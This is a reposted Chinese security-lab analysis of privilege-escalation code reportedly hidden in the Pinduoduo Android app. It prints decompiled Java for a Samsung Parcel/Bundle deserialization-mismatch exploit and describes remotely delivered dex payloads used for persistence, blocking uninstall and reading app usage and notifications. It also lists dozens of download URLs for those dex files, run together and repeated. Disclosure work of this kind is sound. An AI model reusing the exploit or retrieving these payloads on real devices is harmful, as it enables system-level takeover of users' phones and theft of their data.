【利刃情报】深入分析砍一刀apk内嵌提权代码,及动态下发dex行径
2023-3-9 00:2:52 Author: 利刃信安攻防实验室(查看原文) 阅读量:277 收藏

参考「 深蓝洞察 」的文章:

https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw

 (Bundle 风水 - Android Parcel 序列化与反序列化不匹配系列漏洞,实现 0day/Nday 攻击,从而绕过系统校验,获取系统级 StartAnyWhere 能力)

复现流程如下:
下载3月5日前更新的(6.50版本前)的拼多多apk,如6.49版本:

https://com-xunmeng-pinduoduo.en.uptodown.com/android/download/91472728

解压apk文件,找到拼多多apk中,提权代码所在的文件位置:

pinduoduo-6-49-0.zip\assets\component\com.xunmeng.pinduoduo.AliveBaseAbility.7z\com.xunmeng.pinduoduo.AliveBaseAbility\vmp_src\mw1.bin

以上是一个加VMP壳的dex文件,脱壳还原出代码,可以找到针对不同手机厂商系统的多个用于提权的漏洞利用代码,胆子相当的大,比如利用三星手机“com.samsung.android.cepproxyks.CertByte”的提权漏洞,代码如下:

// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy// [Manwei]// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup 
Public static Bundle makeBundleForSamsungSinceP(Intent intent){ Bundle bundle = new Bundle(); Parcel obtain = Parcel.obtain(); Parcel obtain2 = Parcel.obtain(); Parcel obtain3 = Parcel.obtain(); obtain2.writeInt(3); obtain2.writeInt(13); obtain2.writeInt(72); obtain2.writeInt(3); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(4); obtain2.writeString("com.samsung.android.cepproxyks.CertByte"); obtain2.writeInt(0); byte b[] = new byte[0]; obtain2.writeByteArray(b); obtain2.writeInt(0); obtain2.writeInt(13); obtain2.writeInt(72); obtain2.writeInt(53); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(1); obtain2.writeInt(1); obtain2.writeInt(13); obtain2.writeInt(72); obtain2.writeInt(48); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(0); obtain2.writeInt(13); obtain2.writeInt(-1); int dataPosition = obtain2.dataPosition(); obtain2.writeString("intent"); obtain2.writeInt(4); obtain2.writeString("android.content.Intent"); obtain2.writeToParcel(obtain3, 0); obtain2.appendFrom(obtain3, 0, obtain3.dataSize()); int dataPosition2 = obtain2.dataPosition(); obtain2.setDataPosition(dataPosition2 - 4); obtain2.writeInit(dataPosition2 -dataPosition); obtain2.setdataPosition(dataPosition2); int dataSize = obtain2.dataSize(); obtain.writeInt(dataSize); obtain.writeInt(1279544898); obtain.appendFrom(obtain2, 0, dataSize); obtain.setDataPosition(0); bundle.readFromParcel(obtain); return bundle;}

提权后,就开始瞎搞了,动态下发dex,开始给自己保活,防卸载,然后搞数据,这部分代码比较通俗易懂, 比如:

1a68d982e02fc22b464693a06f528fac.dex

读取用户手机上的app使用记录

95cd95ab4d694ad8bdf49f07e3599fb3.dex

读取用户手机的应用通知,这一波各大公司app全灭了吧?

自己去dex目录看吧。

部分dex文件的下载地址(3月3日已被拼多多从CDN服务器上删除):

https://commfile.pddpic.com/galerie-go/spirit/sd1000/dex/f4247da0-6274-44eb-859a-b4c35ec0dd71.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dex/f4247da0-6274-44eb-859a-b4c35ec0dd71.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dex/f4247da0-6274-44eb-859a-b4c35ec0dd71.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dex/f4247da0-6274-44eb-859a-b4c35ec0dd71.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/45783d15-9f56-43a7-b3c7-930872f91c9b.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/45783d15-9f56-43a7-b3c7-930872f91c9b.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/45783d15-9f56-43a7-b3c7-930872f91c9b.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/4a72c6bb-337c-46c4-8c9c-637efafdd1c6.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/61517b68-7c09-4021-9aaa-cdebeb9549f2.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/78afc1cd-60da-482b-90e7-4d5e72a01266.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/dynamic/f9b6b139-4516-4ac2-896d-8bc3eb1f2d03.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/6932a923-9f13-4624-bfea-1249ddfd5505.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/7c6e6702-e461-4315-8631-eee246aeba95.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/8c34f5dc-f04c-40ba-98d4-7aa7c364b65c.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/a3937709-b9cc-48fd-8918-163c9cb7c2df.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/a4d4dccf-1f8c-48e3-acd5-92cdf156e585.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/hw/e9ded9d4-1c94-47d0-8e8b-94aa773af81c.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/4569a29c-b5a8-4dcf-a3a6-0a2f0bfdd493.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/538278f3-9f68-4fce-be10-12635b9640b2.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/75dcc8ea-d0f9-4222-b8dd-2a83444f9cd6.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/7c3507cc-c1a7-4c97-bfa3-e70b938d8f07.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/7c3507cc-c1a7-4c97-bfa3-e70b938d8f07.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/7ce6d296-a5bd-4718-9f79-543621ba5422.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/e723d560-c2ee-461e-b2a1-96f85b614f2b.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/oppo/f0139a82-8bb6-4f3e-a81b-70200fc38eaa.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/sdlog/218a37ea-710d-49cb-b872-2a47a1115c69.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/vivo/136d4651-df47-41b4-bb80-2ec0ab1bc775.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/vivo/4f260398-e9d1-4390-bbb9-eeb49c07bf3c.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/vivo/7dee63bd-ebad-4d74-a06f-90750aa18e18.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/vivo/8b56d820-cac2-4ca0-8a3a-1083c5cca7ae.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/vivo/cdcbd06b-8a32-4645-b9fe-c186b548c34e.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/xm/5d372522-b6a4-4c1b-a0b4-8114d342e6c0.dexhttps://commfile.pddpic.com/galerie-go/spirit/sd1000/xm/74168acd-14b4-4ff8-842e-f92b794d7abf.dexhttps://commfile.pddpic.com/sdfile/common/1a68d982e02fc22b464693a06f528fac.dexhttps://commfile.pddpic.com/sdfile/common/35604479f8854b5d90bc800e912034fc.dexhttps://commfile.pddpic.com/sdfile/common/35604479f8854b5d90bc800e912034fc.dexhttps://commfile.pddpic.com/sdfile/common/35604479f8854b5d90bc800e912034fc.dexhttps://commfile.pddpic.com/sdfile/common/35604479f8854b5d90bc800e912034fc.dexhttps://commfile.pddpic.com/sdfile/common/561341f5f7976e13efce7491887f1306.dexhttps://commfile.pddpic.com/sdfile/common/6afc90e406bf46e4a29956aabcdfe004.dexhttps://commfile.pddpic.com/sdfile/common/6afc90e406bf46e4a29956aabcdfe004.dexhttps://commfile.pddpic.com/sdfile/common/6f9451e79a0a4b53aff86fe489dffd22.dexhttps://commfile.pddpic.com/sdfile/common/98f10c20525142f9929b4f267b6ccf4d.dexhttps://commfile.pddpic.com/sdfile/common/b50477f70bd14479a50e6fa34e18b2a0.dexhttps://commfile.pddpic.com/sdfile/common/b50477f70bd14479a50e6fa34e18b2a0.dexhttps://commfile.pddpic.com/sdfile/common/b50477f70bd14479a50e6fa34e18b2a0.dexhttps://commfile.pddpic.com/sdfile/common/b50477f70bd14479a50e6fa34e18b2a0.dexhttps://commfile.pddpic.com/sdfile/common/cab85f8e4487412483ee00c2ecf06737.dexhttps://commfile.pddpic.com/sdfile/common/cab85f8e4487412483ee00c2ecf06737.dexhttps://commfile.pddpic.com/sdfile/common/d4b6d58467fb417380d53382b8adcfd6.dexhttps://commfile.pddpic.com/sdfile/common/da60112a4b2848adba2ac11f412cccc7.dexhttps://commfile.pddpic.com/sdfile/common/da60112a4b2848adba2ac11f412cccc7.dexhttps://commfile.pddpic.com/sdfile/common/f35735a5cbf445c785237797138d246a.dexhttps://commfile.pddpic.com/sdfile/common/td/2aa151e2cfa04acb8fb96e523807ca6b.dexhttps://commfile.pddpic.com/sdfile/common/td/2aa151e2cfa04acb8fb96e523807ca6b.dexhttps://commfile.pddpic.com/sdfile/common/td/8aeb045fad9343acbbd1a26998b6485a.dexhttps://commfile.pddpic.com/sdfile/hw/da03be2689cc463f901806b5b417c9f5.dexhttps://commfile.pddpic.com/sdfile/hw/perm/257682c986ab449ab9e7c8ae7682fa61.dexhttps://commfile.pddpic.com/sdfile/oppo/480ed5841ebf4b9c8900c19e700edbed.dexhttps://commfile.pddpic.com/sdfile/oppo/50679b0fc43a458dabac39730616fa9b.dexhttps://commfile.pddpic.com/sdfile/oppo/67c9e686004f45158e94002e8e781192.dexhttps://commfile.pddpic.com/sdfile/oppo/bbbfcfd4cc67499eac47f6e44a37b8a4.dexhttps://commfile.pddpic.com/sdfile/oppo/dc638f3e6fa84d56970d9a8ff4fc5295.dexhttps://commfile.pddpic.com/sdfile/vivo/0bb624afe4b54063bfa3299d3afd9736.dexhttps://commfile.pddpic.com/sdfile/vivo/183bb87aa7d744a195741ce524577dd0.dexhttps://commfile.pddpic.com/sdfile/vivo/2eb20dc580aaa5186ee4a4ceb2374669.dexhttps://commfile.pddpic.com/sdfile/vivo/7877ec6850344e7aad5fdd57f6abf238.dexhttps://commfile.pddpic.com/sdfile/vivo/a093b2d4f28c47b186e61951cb14c781.dexhttps://commfile.pddpic.com/sdfile/vivo/a840668f7567459b95869165cfcd13cb.dexhttps://commfile.pddpic.com/sdfile/vivo/ab8ed4c3482c42a1b8baef558ee79deb.dexhttps://commfile.pddpic.com/sdfile/vivo/be7a2b643d7e8543f49994ffeb0ee0b6.dexhttps://commfile.pddpic.com/sdfile/vivo/d643e0f9a68342bc8403a69e7ee877a7.dexhttps://commfile.pddpic.com/sdfile/xm/0fc0e98ac2e54bc29401efaddfc8ad7f.dexhttps://commfile.pddpic.com/sdfile/xm/95cd95ab4d694ad8bdf49f07e3599fb3.dex

利刃信安攻防实验室是一家专业的网络安全公司,致力于提供高效、可靠的网络安全服务。我们拥有多年的网络安全攻防经验和专业技术团队,为企业提供全面的网络安全解决方案。我们的服务范围涵盖等保、软测、密评、风评、渗透等项目合作,能够为企业提供一站式的网络安全服务。

我们的专业团队具备丰富的行业经验和先进的技术,能够为企业提供优质的服务。我们的渗透测试服务可以帮助企业发现网络安全漏洞,制定有效的安全策略,保障企业的信息安全。我们的等保评估服务可以帮助企业满足政府等保要求,保护企业的核心数据。

此外,我们还提供各种网络安全证书培训考证,能够帮助企业提高员工的安全意识和技能水平,从而提高企业的整体安全水平。

如果您需要网络安全服务或者网络安全培训考证,欢迎联系利刃信安攻防实验室。我们将竭诚为您服务,保护您的信息安全。

文章来源:

https://github.com/davinci1010/pinduoduo_backdoor

文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247501575&idx=2&sn=3d6d6542d66d0fb2f614b77eec81b6e5&chksm=fbfb77cacc8cfedce0151d96a59701a0621c585961f73b90d6697a108e4378a67d06ec374199#rd
如有侵权请联系:admin#unsafe.sh